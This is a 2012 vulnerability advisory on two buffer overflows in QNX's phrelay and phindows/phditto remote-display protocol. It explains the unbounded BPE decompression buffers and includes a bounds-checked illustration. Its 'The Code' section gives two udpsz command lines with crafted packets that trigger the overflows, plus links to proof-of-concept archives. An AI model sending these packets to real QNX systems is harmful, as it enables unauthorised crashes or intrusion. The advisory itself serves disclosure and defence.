#######################################################################
Luigi Auriemma
Application: QNX phrelay/phindows/phditto
http://www.qnx.com
http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.phindows/topic/coverpage.html
http://www.qnx.com/developers/docs/6.4.1/neutrino/utilities/p/phrelay.html
Versions: current
Platforms: QNX Neutrino RTOS and Windows
Bugs: A] bpe_decompress stack overflow
B] Photon Session buffer overflow
Exploitation: remote
A] versus client and maybe server
B] versus server
Date: 10 May 2012
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
phrelay and phindows/phditto are based on a proprietary protocol that
allows the Photon graphical environment of the server (through the
phrelay inetd program) to be used from another machine (phindows,
phditto or any other client).
#######################################################################
=======
2) Bugs
=======
--------------------------------
A] bpe_decompress stack overflow
--------------------------------
The BPE (byte pair encoding) compression uses two stack buffers of 256
bytes called "left" and "right".
The bpe_decompress function used in all the client/server programs of
this protocol is affected by a stack-based buffer overflow caused by
the lack of bounds checks on the data stored sequentially into these
two buffers.
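As an added illustration (not code from QNX or from this advisory) of the kind of bound that is missing: a BPE pair-table reader that refuses to append a table entry past code 255, together with the expansion step. The pair-table layout is a hypothetical one modelled on Gage's classic BPE, and the sample streams are constructed, not captured traffic.

```c
#include <stddef.h>
#include <stdint.h>
/* Hypothetical pair-table layout modelled on Gage's classic BPE (an assumption, not the QNX
 * wire format): a byte > 127 skips (byte - 127) codes that stay literal; a byte <= 127 is
 * followed by (byte + 1) two-byte (left, right) pairs appended at the next free code. */
static int bpe_read_table(const uint8_t *in, size_t len, uint8_t left[256], uint8_t right[256])
{
    size_t pos = 0, n = 0;                        /* n = next code to fill */
    for (int i = 0; i < 256; i++) left[i] = right[i] = (uint8_t)i; /* every code starts literal */
    while (n < 256) {
        if (pos >= len) return -1;                /* truncated table */
        int c = in[pos++];
        if (c > 127) { n += c - 127; if (n > 256) return -1; continue; }   /* literal run */
        for (int i = 0; i <= c; i++, n++) {
            if (n >= 256) return -1;              /* the missing bound: a run starting near 255 */
            if (pos + 2 > len) return -1;         /* pair truncated */
            left[n] = in[pos++];
            right[n] = in[pos++];
        }
    }
    return (int)pos;                              /* table bytes consumed */
}
/* Expand pair-coded input into out; returns bytes written, or -1 on any error. */
int bpe_decompress(const uint8_t *in, size_t inlen, uint8_t *out, size_t outcap)
{
    uint8_t left[256], right[256], stack[256];
    int used = bpe_read_table(in, inlen, left, right);
    if (used < 0) return -1;
    size_t o = 0;
    for (size_t i = (size_t)used; i < inlen; i++) {
        int sp = 1; stack[0] = in[i];             /* seed the expansion stack with the coded byte */
        while (sp > 0) {
            uint8_t c = stack[--sp];
            if (left[c] == c) {                   /* literal: emit it */
                if (o >= outcap) return -1;       /* output buffer full */
                out[o++] = c;
                continue;
            }
            if (sp + 2 > 256) return -1;          /* a cyclic table would grow the stack forever */
            stack[sp++] = right[c];               /* push right first so left expands first */
            stack[sp++] = left[c];
        }
    }
    return (int)o;
}
/* Constructed samples (not captured traffic): one valid stream and two hostile tables. */
static const uint8_t GOOD[]    = {0xFF, 0x00, 'a', 'b', 0xFE, 0x80, 'c'};   /* code 0x80 = "ab" */
static const uint8_t OVERRUN[] = {0xFF, 0xFE, 0x01, 'a', 'b', 'c', 'd'};     /* 2nd pair lands at code 256 */
static const uint8_t CYCLE[]   = {0xFF, 0x01, 0x81, 0, 0x80, 0, 0xFD, 0x80}; /* 0x80 <-> 0x81 never bottoms out */
static uint8_t OUT[64];                           /* scratch output for the checks */
```

Without the `n >= 256` test, the OVERRUN table would write its second pair at left[256]/right[256], past the end of both 256-byte stack arrays.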
---------------------------------
B] Photon Session buffer overflow
---------------------------------
A buffer overflow affecting phrelay in the handling of the device file
that the client specifies as an existing Photon session.
Note: considering that phrelay is not enabled by default and allows
connecting without authentication directly to /dev/photon (the screen
physically visible on the machine), and that phindows/phditto must be
manually pointed at the malicious host to exploit bug A, this
advisory must be considered only a case study and nothing more.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18112.zip
A]
At the moment I don't know how to call bpe_decompress on phrelay, but I
have verified that the bpe_decompress function is 100% vulnerable.
The following test works only on phindows/phditto (the proof-of-concept
acts as a server):
udpsz -C "a5 00 00 01 0000 ffff" -b A -l 0 -T -1 0 4868 1+7+0xffff
B]
udpsz -C "a5 10 00 00 0000 ffff 1400000008040100000000008002e0010000000000000000000000000000" -b A -T SERVER 4868 1+7+0xffff
#######################################################################
======
4) Fix
======
No fix.
#######################################################################